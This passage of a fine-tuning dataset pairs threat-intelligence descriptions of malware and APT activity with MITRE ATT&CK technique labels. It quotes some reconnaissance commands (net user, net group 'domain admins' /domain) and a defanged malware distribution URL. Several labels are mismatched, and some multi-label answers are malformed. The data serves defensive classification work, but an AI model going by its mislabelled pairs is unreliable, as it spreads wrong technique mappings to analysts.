- "content": "scripts save memory dump data into a specific directory on hosts in the victim environment."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kerrdown can download additional software including Cobalt Strike from servers on the victim's network."
- },
- {
- "role": "assistant",
- "content": "T1570 - Lateral Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Build Tool Most of CARBANAK’s strings are encrypted in order to make analysis more difficult"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "jRAT has command line access."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 routinely removed their tools, including custom backdoors, once remote access was achieved. APT29 has also used SDelete to remove artifacts from victims."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EVILNUM can search for anti-virus products on the system."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 has created a scheduled task named “AdobeFlashSync” to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Neither this new domain nor the IP it resolves to have been observed in the past, indicating that the sample in Table 3 may be associated with a newer campaign"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QuasarRAT has a module for performing remote desktop access."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects the users of the system."
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team used the \"sp_addlinkedsrvlogin\" command in MS-SQL to create a link between a created account and other servers in the network."
- },
- {
- "role": "assistant",
- "content": "T1098 - Account Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The default case when the service tag is empty allows the malware to treat the contents of the response from the C2 as a command to execute via the Go library functions os.exec.Command or os.exec.Start. The format of the received command is checked against the below regex pattern for validity before executing and the command is read from the body of the message received from the C2"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has gathered hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems."
- },
- {
- "role": "assistant",
- "content": "T1187 - Forced Authentication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT37 injects its malware variant, ROKRAT, into the cmd.exe process."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "an executable (also compressed, i.e. zip, rar or cab archive), sometimes pretending to be a different file format, like Dyreza - a document (commonly PDF or some MS Office format ) – like this Dridex downloader"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "All the strings and settings were encrypted and obfuscated"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla surveys a system upon check-in to discover the system time by using the \"net time\" command."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MechaFlounder has the ability to use HTTP in communication with C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POSHSPY uses PowerShell to execute various commands, one to execute its payload."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has used various forms of spearphishing attempting to get a user to click on a malicous link."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo has displayed fake forms on top of banking sites to intercept credentials from victims."
- },
- {
- "role": "assistant",
- "content": "T1056.002 - Input Capture: GUI Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers product names from the Registry key: HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion ProductName and the processor description from the Registry key HKLM\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0 ProcessorNameString."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Anchor has been signed with valid certificates to evade detection by security tools."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The actor then tested connectivity to an IP managed by the victim’s service provider. Once connectivity to the service provider IP was verified, the actor established the service provider IP as a proxy for the victim’s SOGU backdoor. This effectively routes SOGU malware traffic through the victim’s service provider, which likely indicates a foothold on the service provider’s network. The tactic also serves to mask malicious C2 and exfiltration traffic and make it appear innocuous"
- },
- {
- "role": "assistant",
- "content": "T1090.002 - External Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Analysis of their configurations show that the C2 servers used both fully-qualified domain names and IP addresses"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ServHelper may attempt to establish persistence via the \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\" run key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Avira’s Advanced Threat Research team, has been tracking Mustang Panda APT for a while. According to Avira’s telemetry data, Mustang Panda mostly targets Asia-Pacific (APAC) countries and uses Cobalt or PlugX as payload"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File', 'T1049 - System Network Connections Discovery', 'T1560.001 - Archive Collected Data: Archive via Utility', 'T1057 - Process Discovery', 'T1016 - System Network Configuration Discovery', 'T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This .NET executable, similar to many other tools used by the Gamaredon group, uses obfuscation techniques such as junk code insertion and string obfuscation. It places the resulting executable in an existing directory and creates a scheduled task that will launch it every 10 minutes. As can be seen in Figure 6, the decoded source code still has comments in it, illustrating the apparent sloppiness of Gamaredon’s operators"
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The spear phishing emails and attached malicious macro documents typically have geopolitical themes"
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GrimAgent can collect the OS, and build version on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Additionally, on that same url, http://mdzz2019.noip[.]cn:3654/ is used to distribute more versions of this Gh0stRAT sample, along with a .zip file containing ASPXSpy, a web shell"
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team used UPX to pack a copy of Mimikatz."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has run net user, net user /domain, net group “domain admins” /domain, and net group “Exchange Trusted Subsystem” /domain to get account listings on a victim."
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Winnti for Windows can use Native API to create a new process and to start services."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DanBot has the ability to execute arbitrary commands via `cmd.exe`."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Reaver installs itself as a new service."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Keydnap uses HTTPS for command and control."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-1314 actors spawned shells on remote systems on a victim network to execute commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MESSAGETAP uses the libpcap library to listen to all traffic and parses network protocols starting with Ethernet and IP layers. It continues parsing protocol layers including SCTP, SCCP, and TCAP and finally extracts SMS message data and routing metadata."
- },
- {
- "role": "assistant",
- "content": "T1040 - Network Sniffing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Monday, February 12, 2018 . Olympic Destroyer Takes Aim At Winter Olympics . This blog post is authored by Warren Mercer and Paul Rascagneres. Officials at the games confirmed some technical issues to non-critical systems and they completed recovery within around 12 hours. The destructive nature of this malware aims to render the machine unusable by deleting shadow copies, event logs and trying to use PsExec & WMI to further move through the environment. This feature explains why we discovered several samples with different sets of credentials that were collected from previously infected systems. Dropped Files . Browser Credential Stealer . Olympic Destroyer drops a browser credential stealer. SQLite is embedded in the sample: . System Credential Stealer . In additional to the browsers credential stealer, Olympic Destroyer drops and executes a system stealer. This step is executed to ensure that file recovery is not trivial - WBAdmin can be used to recover individual files, folders and also whole drives so this would be a very convenient tool for a sysadmin to use in order to aid recovery. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"Disabled: Specifies that the service should not be started. Legitimate File . Additionally, the Olympic Destroyer drops the legitimate, digitally signed, PsExec file in order to perform lateral movement by using this legitimate tool from Microsoft. categories . Subscribe To Our Feed . Blog Archive . - - - - - - - - - - - - ▼ February (14) CannibalRAT targets Brazil Who Wasn’t Responsible for Olympic Destroyer"
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BloodHound can enumerate and collect the properties of domain computers, including domain controllers."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chrommme can encrypt and store on disk collected data before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "replaces the Sticky Keys binary C:\\Windows\\System32\\sethc.exe for persistence."
- },
- {
- "role": "assistant",
- "content": "T1546.008 - Event Triggered Execution: Accessibility Features"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attor has manipulated the time of last access to files and registry keys after they have been created or modified."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wingbird checks the victim OS version after executing to determine where to drop files based on whether the victim is 32-bit or 64-bit."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WhisperGate can overwrite sectors of a victim host's hard drive at periodic offsets."
- },
- {
- "role": "assistant",
- "content": "T1561.001 - Disk Content Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zox can enumerate attached drives."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After using RTF files, the group started using self-extracting (SFX) archives that use common document icons in an attempt to further mislead their victims. It was briefly documented by Threatbook (in Chinese). When run, these self-extracting RAR files drop and execute DLL files (with a .ocx extension) with the final payload being the previously documented {A96B020F-0000-466F-A96D-A91BBF8EAC96}.dll. This section will describe the technique and what they have altered to achieve their goal"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "adds a Registry Run key to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "What does the Poseidon Group do? What happens after a target machine is infected? Once the target’s machine is compromised, the attacker first enumerates all processes running in the system and all services"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has performed file deletion to evade detection."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attempt to get detailed information about the operating system and hardware, such as version, patches, hotfixes, service packs, and architecture (System Information Discovery [T1082]) - Enumerate files and directories or search in specific locations of a host or network share for particular information within a file system (File and Directory Discovery [T1083]) - Get a list of security software, configurations, defensive tools, and sensors installed on the system (Software Discovery: Security Software Discovery [T1518.001]) - Procure information about running processes on a system to understand standard software running on network systems (Process Discovery [T1057]) - Identify primary users, currently logged in users, sets of users that commonly use a system, or active or inactive users (System Owner/User Discovery [T1033]) - Enumerate browser bookmarks to learn more about compromised hosts, reveal personal information about users, and expose details about internal network resources (Browser Bookmark Discovery [T1217]) - Look for information on network configuration and system settings on compromised systems, or perform remote system discovery (System Network Configuration Discovery [T1016]) - Interact with the Windows Registry to gather information about the system, configuration, and installed software (Query Registry [T1012]) - Get a list of open application windows to learn how the system is used or give context to data collected (Application Window Discovery [T1010]) - Attempt to get a listing of local system or domain accounts in the compromised system (Account Discovery [T1087]) - Obtain a list of network connections to and from the compromised system or remote system by querying for information over the network (System Network Connections Discovery [T1049"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery', 'T1518.001 - Software Discovery: Security Software Discovery', 'T1033 - System Owner/User Discovery', 'T1082 - System Information Discovery', 'T1217 - Browser Bookmark Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KGH_SPY has the ability to set a Registry key to run a cmd.exe command."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can can remove all system restore points."
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has used remote administration tools or remote industrial control system client software to maliciously release electricity breakers."
- },
- {
- "role": "assistant",
- "content": "T1219 - Remote Access Software"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ramsay can detect system information--including disk names, total space, and remaining space--to create a hardware profile GUID which acts as a system identifier for operators."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ebury can list directory entries."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ThreatNeedle can collect system profile information from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Koadic can identify logged in users across the domain and views user sessions."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire can use PowerSploit's \"Invoke-TokenManipulation\" to manipulate access tokens."
- },
- {
- "role": "assistant",
- "content": "T1134 - Access Token Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Regin malware platform supports many standard protocols, including SMB."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some of the executables pack the collected data into a password protected archive and save it to the disk, while others send the data to the C&C server directly"
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging', 'T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These four were then all modified on the same date and time on October 13, 2018 08:21"
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Neoichor can use HTTP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One of the documents is called “همبستگی عاشقانه با عاشقان آزادی2.doc” (translates from Persian as “Romantic Solidarity With Lovers of Freedom2.doc”) and contains malicious macros that are accompanied by an odd decoy message attempting to convince the victim to enable its content"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has used LinkedIn to send spearphishing links."
- },
- {
- "role": "assistant",
- "content": "T1566.003 - Spearphishing via Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Saint Bot has enumerated running processes on a compromised host to determine if it is running under the process name `dfrgui.exe`."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "From October 2012 to May 2014, FireEye observed APT12 utilizing RIPTIDE, a proxy-aware backdoor that communicates via HTTP to a hard-coded command and control (C2) server. RIPTIDE’s first communication with its C2 server fetches an encryption key, and the RC4 encryption key is used to encrypt all further communication"
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "At this point in the execution cycle, the FoggyWeb DLL is loaded into one or more application domains where the legitimate AD FS code is running. This means the backdoor code runs alongside the AD FS code with the same access and permissions as the AD FS application. Such access allows the FoggyWeb backdoor to directly interact with the AD FS codebase (that is, not an external disk-resident tool) and selectively invoke native AD FS methods needed to facilitate its malicious operations"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
